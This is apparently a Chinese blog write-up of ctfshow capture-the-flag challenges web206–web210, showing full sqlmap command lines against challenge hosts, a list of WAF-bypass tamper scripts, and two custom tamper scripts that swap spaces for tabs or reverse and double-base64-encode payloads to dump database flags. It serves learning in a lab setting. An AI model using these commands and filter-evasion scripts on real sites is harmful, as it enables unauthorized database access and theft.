ctfshow-web入门-sql注入(web206-web210)系统练习sqlmap之tamper的使用与编写

于 2024-08-11 01:06:06 发布
阅读量560 收藏 17
点赞数 22
分类专栏: SQL ctfshow web 文章标签: sql 数据库 web安全 学习 web sqlmap mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/141096632
版权
web 同时被 3 个专栏收录
167 篇文章 20 订阅
订阅专栏
ctfshow
68 篇文章 1 订阅
订阅专栏
SQL
23 篇文章 1 订阅
订阅专栏

目录

1、web206

2、web207

3、web208

4、web209

5、web210

1、web206

sql需要闭合 

 测了一下还是会先请求 /api/getToken.php

查询语句里新增了括号,我们注入也需要将其闭合掉,就像我们闭合单引号那样,对于 sqlmap 它会自动对闭合点进行测试的,常见的就是单引号、双引号、单引号加括号或者双引号加括号。 

我们现在不是手动注入,而是在用工具跑,直接用上一题的 payload 打:

将 url 和 cookie 替换成自己题目的,先跑数据库

python sqlmap.py -u http://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=ehie8a6a7jfba3cv19q5b7huvs" --safe-url="https://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/api/getToken.php" --safe-freq=1 --dbs --batch

查数据库 ctfshow_web 下所有的表:

python sqlmap.py -u http://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=ehie8a6a7jfba3cv19q5b7huvs" --safe-url="https://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web --tables --batch

存在一个名为 ctfshow_flaxc 的表 

 

查该表下的所有列名:

python sqlmap.py -u http://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=ehie8a6a7jfba3cv19q5b7huvs" --safe-url="https://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flaxc --columns --batch

查具体字段信息: 

python sqlmap.py -u http://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=ehie8a6a7jfba3cv19q5b7huvs" --safe-url="https://3a456b73-7aec-4296-88d9-db6a1712922c.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flaxc -C flagv,id,tes --dump --batch

拿到 flag:ctfshow{b7eea077-ba49-4792-bfe6-9c5ff6c9cc01}

2、web207

--tamper 的初体验

--tamper 用于指定某个脚本,实现对过滤的绕过

这里是过滤了空格:

空格被过滤可以使用 space2comment.py,sqlmap --tamper 绕过WAF脚本分类整理:

apostrophemask.py	用utf8代替引号
base64encode.py 	用base64编码替换
multiplespaces.py	围绕SQL关键字添加多个空格
space2plus.py	用+替换空格
space2comment.py	Replaces space character (‘ ‘) with comments ‘/**/’
unionalltounion.py	替换UNION ALL SELECT UNION SELECT
securesphere.py	追加特制的字符串
equaltolike.py	like 代替等号
greatest.py	绕过过滤’>’ ,用GREATEST替换大于号
space2mssqlhash.py	替换空格
between.py	用between替换大于号(>)
randomcase.py	随机大小写
versionedmorekeywords.py	注释绕过
halfversionedmorekeywords.py	关键字前加注释
space2morehash.py	空格替换为 #号 以及更多随机字符串 换行符

在上一题 payload 的基础上追加 --tamper 参数:同样我们先跑数据库名

python sqlmap.py -u http://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=2lo2ir916nm0onrmog4boq7rsd" --safe-url="https://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/api/getToken.php" --safe-freq=1 --dbs --batch --tamper space2comment.py

跑数据库 ctfshow_web 下的所有表名:

python sqlmap.py -u http://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=2lo2ir916nm0onrmog4boq7rsd" --safe-url="https://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web --tables --batch --tamper space2comment.py

跑表 ctfshow_flaxca 下所有的列名:

python sqlmap.py -u http://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=2lo2ir916nm0onrmog4boq7rsd" --safe-url="https://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flaxca --columns  --batch --tamper space2comment.py

查字段 flagvc 的具体信息:

python sqlmap.py -u http://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=2lo2ir916nm0onrmog4boq7rsd" --safe-url="https://010a0a32-7c8b-4c6a-af1f-bc458f5183fc.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flaxca -C flagvc --dump --batch --tamper space2comment.py

 

拿到 flag:ctfshow{06c81e21-0f3d-49eb-9609-4a7ab6f48692}

3、web208

不仅过滤了空格,还将 select 替换为了空,采用大小写绕过,即 randomcase.py 随机大小写:

我们知道数据库就是 ctfshow_web,这次直接跑表名:

python sqlmap.py -u http://ed4bb388-5813-4f01-8c51-f57aeb8466be.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://ed4bb388-5813-4f01-8c51-f57aeb8466be.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=m751m5q6bq0iovaur5u94kteq4" --safe-url="https://ed4bb388-5813-4f01-8c51-f57aeb8466be.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web --tables --batch --tamper space2comment.py,randomcase.py

跑 ctfshow_flaxcac 下的列名:

python sqlmap.py -u http://ed4bb388-5813-4f01-8c51-f57aeb8466be.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://ed4bb388-5813-4f01-8c51-f57aeb8466be.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=m751m5q6bq0iovaur5u94kteq4" --safe-url="https://ed4bb388-5813-4f01-8c51-f57aeb8466be.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flaxcac --columns --batch --tamper space2comment.py,randomcase.py

跑 flagvca 的具体信息:

python sqlmap.py -u http://ed4bb388-5813-4f01-8c51-f57aeb8466be.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://ed4bb388-5813-4f01-8c51-f57aeb8466be.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=m751m5q6bq0iovaur5u94kteq4" --safe-url="https://ed4bb388-5813-4f01-8c51-f57aeb8466be.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flaxcac -C flagvca --dump --batch --tamper space2comment.py,randomcase.py

拿到 flag:ctfshow{1b58a671-213f-4704-81e1-10b5f5648feb}

4、web209

过滤了空格、星号和等号,等号过滤可以采用 like 代替,即:equaltolike.py  

但是星号被过滤了,因此无法使用内敛注释 /**/,可以采用:水平制表符 (Tab): %09、换行符 (Newline): %0A、回车符 (Carriage Return): %0D 代替空格。

为了不影响它原本的 tamper,我新建了一个名为 myon.py 的文件,放在 tamper 目录下,先将 space2comment.py 的内容复制进去,如下:

这里我们随便选一个,比如用 %09,将 "/**/" 全部替换为 chr(0x09):

注意包括双引号一起替换掉,chr() 不能用双引号包裹,包裹后就成字符串了。

这里附上替换后的,如果有问题可以复制我的试一试:

#!/usr/bin/env python

"""
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x09)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x09)
                continue

            retVal += payload[i]

    return retVal

接下来我们使用 myon.py 和 equaltolike.py 跑表名: 

python sqlmap.py -u http://b67f8aa1-323e-4653-adcd-93ca14c234ea.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://b67f8aa1-323e-4653-adcd-93ca14c234ea.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=6pu7k8ek2p743mt3l38at7hv8c" --safe-url="https://b67f8aa1-323e-4653-adcd-93ca14c234ea.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web --tables --batch --tamper myon.py,equaltolike.py

跑 ctfshow_flav 下的所有列:

python sqlmap.py -u http://b67f8aa1-323e-4653-adcd-93ca14c234ea.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://b67f8aa1-323e-4653-adcd-93ca14c234ea.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=6pu7k8ek2p743mt3l38at7hv8c" --safe-url="https://b67f8aa1-323e-4653-adcd-93ca14c234ea.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flav --columns --batch --tamper myon.py,equaltolike.py

跑字段 ctfshow_flagx 的信息:

python sqlmap.py -u http://b67f8aa1-323e-4653-adcd-93ca14c234ea.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://b67f8aa1-323e-4653-adcd-93ca14c234ea.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=6pu7k8ek2p743mt3l38at7hv8c" --safe-url="https://b67f8aa1-323e-4653-adcd-93ca14c234ea.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flav -C ctfshow_flagx --dump --batch --tamper myon.py,equaltolike.py

拿到 flag:ctfshow{6c70c03b-5911-40d9-87f1-1557c2acd276}

5、web210

会对查询字符进行两轮 base64 解码和反转 

//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }

我们对查询的 payload 进行逆向处理,先反转,再 base64 加密,再反转,再 base64 加密,传入查询后,经过题目的解密和反转处理,最终又恢复到我们正确的 payload 实现注入。

为了避免和它原本目录下的 tamper 混淆,我在 tamper 目录下又新建了一个目录 myon,用于存放自己写的 tamper,这道题的脚本我命名为 strrev+base64.py,内容如下:

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        retVal = base64.b64encode(base64.b64encode(payload[::-1].encode())[::-1]).decode()
    return retVal

选择使用这个 tamper 进行注入:

注意文件路径根据自己实际情况填写

python sqlmap.py -u http://294080ed-8b70-4f5e-b137-062aa1bf8a07.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://294080ed-8b70-4f5e-b137-062aa1bf8a07.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=t9107ek3o7hvkc21n5u9sm9qgj" --safe-url="https://294080ed-8b70-4f5e-b137-062aa1bf8a07.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web --tables --batch --tamper="./tamper/myon/strrev+base64.py"

但是在执行的时候报错: 

make sure that there is an empty file '__init__.py' inside of tamper scripts directory

意思大概是需要一个初始化的  __init__.py 在我们的脚本目录下,我们复制 tamper 目录下的 __init__.py 到自己新建的目录(我这里是 myon 下):

再次执行,成功:

拿到表名 ctfshow_flavi,查该表下的列名:

python sqlmap.py -u http://294080ed-8b70-4f5e-b137-062aa1bf8a07.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://294080ed-8b70-4f5e-b137-062aa1bf8a07.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=t9107ek3o7hvkc21n5u9sm9qgj" --safe-url="https://294080ed-8b70-4f5e-b137-062aa1bf8a07.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flavi --columns --batch --tamper="tamper/myon/strrev+base64.py"

最后直接查 ctfshow_flagxx:

python sqlmap.py -u http://294080ed-8b70-4f5e-b137-062aa1bf8a07.challenge.ctf.show/api/index.php --method="PUT" --data id=1 --referer https://294080ed-8b70-4f5e-b137-062aa1bf8a07.challenge.ctf.show/sqlmap.php --headers="Content-Type: text/plain" --cookie="cf_clearance=zOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q; PHPSESSID=t9107ek3o7hvkc21n5u9sm9qgj" --safe-url="https://294080ed-8b70-4f5e-b137-062aa1bf8a07.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flavi -C ctfshow_flagxx --dump --batch --tamper="tamper/myon/strrev+base64.py"

拿下,flag:ctfshow{549d46ab-3974-43a6-ac07-cbcc41357083}

Myon⁶
关注
  • 22
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入-初入web安全-详细知识图谱
11-06
SQL注入攻击可以发生在任何使用SQL数据库Web应用程序中,因此了解SQL注入攻击的原理和防御方法非常重要。 一、SQL注入攻击的类型 SQL注入攻击可以分为两种类型:基于 UNION Query 的 SQL 注入和基于 Error-based...
sqlmap中文手册-sql注入自动化测试工具
07-19
在实际使用中,如果发现Web页面的参数(如GET、POST或Cookie)可能受到SQL注入的影响,SQLMap可以快速进行验证。例如,通过对URL中的参数进行测试,如`id=1 AND 1=1`和`id=1 AND 1=2`,如果两个请求返回不同的结果,...
ctfshow-web入门-sql注入web201-web205)系统练习sqlmap使用
Welcome To Myon'Blog !
08-09 1108
开始系统练习sqlmap使用。发现在访问 index.php 前都会先访问 getToken.php 追加 --safe-url 参数设置在测试目标地址前访问的安全链接,将 url 设置为 api/getToken.php,再加上 --safe-preq=1 表示访问 api/getToken.php 一次:
CTFshow-WEB入门-SQL注入(中)
feng的博客
02-08 1842
web199 很懵。。。把括号给过滤了,所以varchar(255)就不能用了,考虑改成其他的类型,但是不知道到底哪里出了问题,每次一改不是没效果,就是查不出来东西。一旦alter出错就要重新启容器,很烦。 看了一下y4师傅的姿势,服了 1;show tables; ctfshow_user 对,最简单的方法,一直都没想起来,我太菜了。。。 web200 同上 web201 开始学习sqlmap使用sqlmap使用手册:sqlmap 不过因为是纯英文,英文太菜的我肯定看不太懂,不过也不需要多深入的
ctfshow-WEB-web10( with rollup注入绕过)
热门推荐
wangyuxiang946的博客
09-05 1万+
ctf.show WEB模块第10关是一个SQL注入漏洞, 点击取消按钮可以获取源码, 审计代码可以发现源码中存在漏洞, 推荐使用with rollup注入进行绕过, 此关卡过滤了空格,and等关键字 1. 过滤空格, 可以使用括号()或者注释/**/绕过 2. 过滤and, 可以使用or来代替 进来以后是一个登录界面, 盲猜是SQL注入漏洞 点击取消按钮可以获取这一关的源码, 下载到本地即可 源码中先根据用户名查询用户信息, 用户名通过以后, 再判断密码是否相同, 我...
CTFshow——web入门——sql注入
h_adam的博客
03-14 5568
web入门——sql注入基础知识点判断是否注入order by 判断列数web171web172web173 基础知识点 判断是否注入 使用注释符–+ +代表的是空格 或者使用%23来做注释符 1' and 1=1%23 order by 判断列数 order by 是根据某一列进行排序 使用 1' order by 3--+ 返回正常 1' order by 4--+ 没有数据 说明列数是3 web171 本地测试,查询id为id = '9999' or id='3',9999不存在时会查询id=3
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4329
ctfshow 靶场 web入门 sql注入系列
CTFShow-Web篇详细wp(持续更新中ing)
Aluxian_的博客
04-23 1092
【代码】CTFShow-Web篇详细wp。
CTFshow之web171~180---SQL注入(1)
金 帛的博客
06-04 2315
ctfshow,SQL注入的wp
ctfshow web入门-sql注入
LYJ20010728的博客
09-21 2902
ctfshow web入门-sql注入web171web172web173web174web175web176web177web178web179web180web181web182web183web184web185web186web187web188web189web190web191web192web193web194web195web195web197web198web199web200web201web202web203 web171 根据题目给出的查询语句构造 Payload $sql
ctfshow web入门 sql注入 web209--web213
2301_81040377的博客
05-02 649
getsheel然后链接就行。
sql注入-WAF绕过】编写sqlmaptamper进行sql注入
06-29 6140
【特征】特殊符号+十六进制格式
1、Sqlmap Tamper脚本编写介绍-01
09-15
Sqlmap Tamper脚本编写介绍 Sqlmap Tamper脚本是对Sqlmap工具的扩展,主要功能是对原本的payload进行特定的更改以绕过WAF。Tamper脚本结构主要包括三个部分:Tamper脚本结构介绍、Tamper函数介绍和dependencies函数...
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)注入到数据库。本文将更进一步,讨论SQL...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
SQL 注入攻击与防御 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者通过构造特殊的 SQL 语句来访问、修改或控制数据库中的数据。下面我们将详细介绍 SQL 注入的攻击方式、防御方法和相关工具。 一、SQL 注入攻击...
SQL Server中CPU使用率过高的排查
主宰
08-05 305
如果sqlserver进程导致CPU使用率过高,则最常见的原因是执行表或索引扫描的查询,其次是排序、哈希操作和循环 (嵌套循环运算符或 WHILE (T-SQL) )。对于安装了sqlserver的服务器,可以先看下任务管理器中sqlserver对cpu的占用情况,确定是否是sqlserver导致cpu消耗过高。从输出中具有最高improvement_measure值的前5或10条建议开始。这些索引对性能有最显著的积极影响。使用以下查询检查是否缺少索引,并应用具有高改进度量值的任何建议索引。
SQL回顾
Wincreds的博客
08-05 446
②Cookie 是一种客户端的存储技术,用于在浏览器中存储少量数据。参数包含在请求体中,可以是键值对格式或其他格式,如 JSON。①Session 是一种服务器端的存储技术,用于在用户与网站的交互期间保持用户状态。会话数据通常存储在服务器上的文件或数据库中,可以永久存储用户信息,直到会话过期或被清除。会看到结果,正确密码,与其他的长度不一样,由于网站机制,防爬机制,这里我把密码从666改为了8,节约访问次数。旧密码无所谓,利用 admin’# ,进行修改,修改密码实际上修改的是admin的密码。
SQL Server 事务
最新发布
a876106354的博客
08-09 346
SQL Server 事务是数据库操作的一个基本特性,它允许你将一系列数据库操作组合成一个原子单元,这个单元中的所有操作要么全部成功,要么全部失败。事务具有以下四个重要的属性,通常被称为ACID属性。
[SWPUCTF 2021 新生赛]easy_sql
2301_80218721的博客
08-05 381
这个文章讲的东西基本可以够我去理解一些基本的思路和做法,然后文章里面还附带了一些基本的演示。然后我这里直接就是照着那个文章的思路去写的题目。转web之后第一次做sql,还不是很懂。然后就得到了flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值